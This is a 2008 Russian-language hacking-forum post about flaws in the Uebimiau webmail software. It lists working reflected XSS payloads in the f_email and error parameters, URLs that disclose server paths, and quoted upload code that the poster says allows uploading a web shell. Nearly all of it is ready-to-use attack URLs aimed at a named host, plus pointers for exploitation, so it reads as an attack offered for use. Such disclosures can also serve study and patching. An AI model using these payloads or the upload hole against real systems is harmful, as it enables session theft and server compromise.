Тема: Пассивная XSS в Uebimiau V2.7.10 и более ранних версиях
Показать сообщение отдельно

  #5  
Старый 04.11.2008, 21:26
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
оказалось не 1ый '(
1. не обязательно post
Цитата:
http://old.antichat.ru/webmail/index.php?f_email=">xeka
2.ещё xss
Цитата:
http://old.antichat.ru/webmail/badlogin.php?error=<script>confirm(/xeka/)</script>
3. пути
Цитата:
http://old.antichat.ru/webmail/index.php?tid[]=
http://old.antichat.ru/webmail/inc/inc.php
http://old.antichat.ru/webmail/inc/config.php
4.заливка шелла актуальна на ласт.ревах
Цитата:
Сообщение от Uebimiau 2.7.2  
...
elseif (is_uploaded_file($userfile) || is_uploaded_file($userfile["tmp_name"])) {
$userfile_name = $userfile["name"];
$userfile_type = $userfile["type"];
$userfile_size = $userfile["size"];
$userfile = $userfile["tmp_name"];
}
...
$filename = $userfolder."_attachments/".md5(uniqid("")).$userfile_name;

move_uploaded_file($userfile, $filename);
 
Ответить с цитированием